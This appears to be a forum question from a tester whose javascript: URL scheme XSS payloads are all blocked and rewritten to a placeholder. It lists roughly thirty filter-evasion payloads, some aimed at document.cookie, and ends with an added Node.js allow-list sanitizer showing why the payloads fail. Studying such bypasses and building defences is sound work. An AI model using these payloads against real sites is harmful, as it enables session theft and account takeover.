
Cross Site Scripting with URL protocol scheme javascript

Çağlar Arlı


I'm testing a web application and I found an XSS vulnerability. I can inject schemes like data:// or tel://, but they have blocked the javascript:// scheme. On current browsers the origin is null if I use data://, so data:// is not good.

I have tested:

javascript:alert(1)
javascript+:alert(1)
javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/

but all of them result in this output

<a href="about:invalid#zSoyz">back</a>


I tested javascript.://%250aalert(1) and somehow it passes, but I still can't execute the code.

Output:

<a href="javascript.://%0aalert(1)">back</a>

Failed to launch 'javascript.://%0aalert%281%29;' because the scheme does not have a registered handler.

Maybe I'm missing something but I don't see how to execute javascript under these conditions. Any idea?
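The following is an added example, not part of the original post and not the tested application's code. It shows why every payload in the list above normalizes to the same thing: the WHATWG URL parser that browsers (and Node.js) share strips tabs, CR and LF, ignores leading control characters and lowercases the scheme before anything is compared, so `%09Jav%09ascript:` and `java%0d%0ascript%0d%0a:` are all just `javascript:` by the time a scheme filter looks at them, while `javascript.:` is a syntactically valid but unregistered scheme, which is exactly what the browser's "no registered handler" message says. The `about:invalid#zSoyz` placeholder mirrors the output shown above (it is the innocuous value Google's Closure Templates / Soy emits for a rejected URI); the single round of percent-decoding, the page origin `https://app.example/` and the allow-list itself are assumptions for the demonstration.

```javascript
// Added example: scheme allow-listing for href values, using the WHATWG URL
// parser. Assumptions (not from the post): the application percent-decodes
// the value once (the post shows %250a becoming %0a), resolves it against a
// hypothetical page origin, and allows only the schemes listed below.
const PLACEHOLDER = 'about:invalid#zSoyz';           // matches the post's output
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);
const PAGE_BASE = 'https://app.example/';            // hypothetical origin

// One round of percent-decoding, as the application appears to do.
// A lone %a0 (an invalid UTF-8 continuation byte) makes decodeURIComponent
// throw; treat that as "not a usable URL" rather than letting it through.
function decodeOnce(raw) {
  try {
    return decodeURIComponent(raw);
  } catch {
    return null;
  }
}

// Canonical protocol ("javascript:", "https:", "javascript.:", ...) after the
// parser has removed tab/CR/LF, trimmed leading controls and lowercased the
// scheme; null when the value does not parse as a URL at all.
function protocolOf(raw) {
  const decoded = decodeOnce(raw);
  if (decoded === null) return null;
  try {
    return new URL(decoded, PAGE_BASE).protocol;
  } catch {
    return null;
  }
}

// Emit the value only if its parsed scheme is on the allow-list; anything
// else, including unparseable input, becomes the placeholder.
function sanitizeHref(raw) {
  const decoded = decodeOnce(raw);
  if (decoded === null) return PLACEHOLDER;
  let url;
  try {
    url = new URL(decoded, PAGE_BASE);
  } catch {
    return PLACEHOLDER;
  }
  return ALLOWED_PROTOCOLS.has(url.protocol) ? decoded : PLACEHOLDER;
}

// Constructed sample: a few payloads from the post plus one benign relative
// href for comparison.
const SAMPLE_HREFS = [
  '%09Jav%09ascript:alert(document.domain)',
  'java%0d%0ascript%0d%0a:alert(0)',
  'javascript://%250Aalert(1)',
  'javascript://whitelisted.com?%a0alert%281%29',
  'javascript.://%250aalert(1)',
  '/account/back',
];

function classify(hrefs) {
  return hrefs.map((h) => ({ payload: h, protocol: protocolOf(h), href: sanitizeHref(h) }));
}

for (const row of classify(SAMPLE_HREFS)) {
  console.log(`${row.payload}\n  parsed scheme: ${row.protocol}\n  emitted href:  ${row.href}`);
}
```

Run it with `node` and compare the "parsed scheme" column with the payloads: the tab, CR/LF and case tricks all collapse to `javascript:`, the `%a0` variant is rejected at the decode step, and `javascript.:` survives parsing but is neither on the allow-list nor something any browser will dispatch.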